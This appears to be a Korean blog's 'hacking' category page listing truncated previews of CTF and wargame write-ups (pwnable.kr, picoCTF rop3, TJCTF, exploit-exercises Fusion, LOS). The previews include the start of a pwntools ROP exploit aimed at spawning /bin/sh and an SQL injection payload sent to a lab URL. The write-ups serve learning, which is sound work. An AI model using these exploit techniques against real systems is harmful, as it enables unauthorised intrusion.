hacking(287)
-
pwnable.kr - random
pwn.kr random문제입니다.소스코드를 보면 random값하고 제가 넣은 input하고 xor연산을 통해서 deadbeef와 같으면 flag를 줍니다. 그럼 random값만 알게된다면 쉽게 풀 수 있습니다.random값을 알기위해서 ltrace명령어를 사용합니다. python으로 xor연산을 하면? 그대로 입력하면?(grin)
2018.08.16 -
[pico CTF 2013] rop3
pico CTF Rop3번문제 (grin) 취약점 분석! 똑..같다 ㅎ하지만 이번에는 shell을 직접 띄어줘야한다 ㅠㅠ 저번에푼rop공룡같이 풀어본다!! 123456789101112131415161718192021222324252627282930313233from pwn import * r = process("./rop3") payload = ""read_plt = 0x08048360read_got = 0x0804a000write_plt = 0x080483a0shell = "/bin/sh"bss = 0x0804a020offset = 0x9ad60pppr = 0x804855d payload += "A"*140payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bs..
2018.08.16 -
[TJCTF2018] - Cookie monster
이번에는 10점짜리 문제이다 :) 처음에 들어가보면 새로운 사이트에서 말그림이 하나 나온다.스크롤을 쭉 내리니 다리가 계속 생긴다. 이건 소스코드에 무건가가 있다 생각하고 보았지만.. 다음과 같이 아무것도 없다.문뜩 떠오른 생각에 문제 이름이 cookie였다. 그래서 확인해보았다. 어라...이런문제구나 :)(grin)
2018.08.16 -
[TJCTF 2018] - Blank
아주 간단한 시작문제... 링크로 들어가고 엇...어라 문제이름같이 진짜 Blank네요 ㅎㅎ 우리를 웹으로 안내했으니 F12를 눌러봅시다! (grin)
2018.08.13 -
exploit-exercise Fusion level-00
맞습니다.. 다음과제는 exploit-exercise funsion이였습니다 :) lob와 비슷해보이는데 조금더 리얼한 코드같습니다. 코드를 먼저확인하죠. 123456789101112131415161718192021222324252627282930313233343536373839404142434445#include "../common/common.c" int fix_path(char *path){ char resolved[128]; if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open//취약점 각 becuase memcmp strcpy(path, resolved);} char *parse_..
2018.08.10 -
10. LOS - skeleton
LOS 10번째 문제 skeleton입니다! 먼저 코드를 보면 pw뒤에 and 1 = 0으로 만들어줘서 고의적으로 거짓으로 만들어 줬습니다.그럼 저 부분을 참으로 만들어줘야하는데저는 id에 'admin'을 넣고 뒷부분을 모두 주석으로 처리해주어서 풀었습니다 :)페이로드는 다음과 같습니다. 1234567891011import requestsimport string URL = "http://los.eagle-jump.org/skeleton_8d9cbfe1efbd44cfbbdc63fa605e5f1b.php"payload = "?pw=admin' or id='admin'%23"URL += payload cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11")respo..
2018.08.07